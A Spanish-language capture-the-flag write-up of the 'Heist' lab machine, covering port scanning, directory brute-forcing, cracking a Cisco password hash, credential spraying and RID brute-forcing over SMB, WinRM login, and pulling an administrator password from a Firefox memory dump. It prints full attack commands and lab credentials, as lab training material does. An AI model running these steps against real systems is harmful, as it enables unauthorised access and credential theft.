Heist
✍️ Autor: MinatoTW🔍 Dificultad: Fácil 📅 Fecha de creación: 20/11/2019
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 10.10.10.149para verificar la conectividad de red.
A continuación, realizamos el comando:
nmap -sC -sV 10.10.10.149para realizar un escaneo de puertos y servicios detallado en la dirección IP.
Durante el escaneo se identificaron los siguientes puertos abiertos:
Puerto 80 (HTTP): El puerto 80 está abierto y ejecutando un servidor web Microsoft IIS 10.0. Además, la página detectada es "Support Login Page" y el recurso solicitado es
login.php.Puerto 135 (MSRPC): El puerto 135 (RPC) está abierto, lo cual indica que el sistema Windows puede estar ejecutando servicios de administración remota.
Puerto 445 (SMB): El puerto 445 está abierto, lo que indica que SMB (Server Message Block) está en uso. Esto puede abrir múltiples vectores de ataque.
A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80,135,445 -v 10.10.10.149para que nos proporcione más información sobre esos puertos específicamente.
Revisamos el puerto 80.
Le damos a iniciar como invitado.
Vemos que hay dos usuarios llamados Hazard y Admin. Hazard tiene un problema con el router de CISCO. Hacemos una búsqueda de directorios.
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.10.149/FUZZ
Me llama la atención el directorio attachments.
Nos da error ya que no tenemos permisos por lo que enumeramos los archivos que contiene ese directorio.
gobuster dir -u http://10.10.10.149/attachments/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,pdf,jpg,png,zip,docx,csv
Nos llama la atención el fichero config.txt.
Vemos unas contraseñas de Cisco por lo que las crackeamos.
🚀 EXPLOTACIÓN
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Con crackmapexec miramos las credenicales posibles con Hazard y esas contraseñas.
crackmapexec smb 10.10.10.149 -u Hazard -p contraseñas.txt
El RID Bruteforce es una técnica para enumerar usuarios de un sistema Windows explotando cómo funciona el protocolo SMB por lo que eso hacemos.
crackmapexec smb 10.10.10.149 -u Hazard -p stealth1agent --rid-brute
Han aparecido mas usuarios por lo que descubrimos si tenemos sus contraseñas.
crackmapexec smb 10.10.10.149 -u usuarios.txt -p contraseñas.txt
Hemos encontrado las credenciales de Chase. Nos logueamos para tener acceso a WINRM.
evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"
🔐 PRIVILEGIOS
El primer punto menciona “Seguir revisando la lista de incidencias”. Esto se puede hacer a través de un navegador. Si recordamos, las incidencias eran la sección donde el usuario "Hazard" tenía problemas con su router Cisco y donde pudimos acceder a su archivo de configuración en los adjuntos. Esto sugiere que quien escribió esta nota monitorea activamente las incidencias en el servidor web.
Además, hemos notado que Firefox está instalado en la máquina, a pesar de no ser el navegador predeterminado.
Subimos esto.
Generar el volcado de memoria: Lo primero que hago es obtener el volcado de memoria de un proceso, como Firefox, utilizando la herramienta procdump. Para ello, ejecuto el siguiente comando en PowerShell, sustituyendo <PID> por el ID del proceso que quiero volcar.
.\procdump64.exe -ma 6624 -accepteula firefox.dmp
Buscar las credenciales: Una vez que tengo el volcado de memoria, procedo a buscar la contraseña o los hashes de las credenciales dentro del archivo .dmp. En este caso, encontré la contraseña del administrador: 4dD!5}x/re8]FBuZ.
download firefox.dmp
strings firefox.dmp | grep -ie "login_username\|login_password"
Conseguimos las credenciales de administrator de SMB.
smbclient //10.10.10.149/C$ -U administrator
Ya somos root.
Last updated
Was this helpful?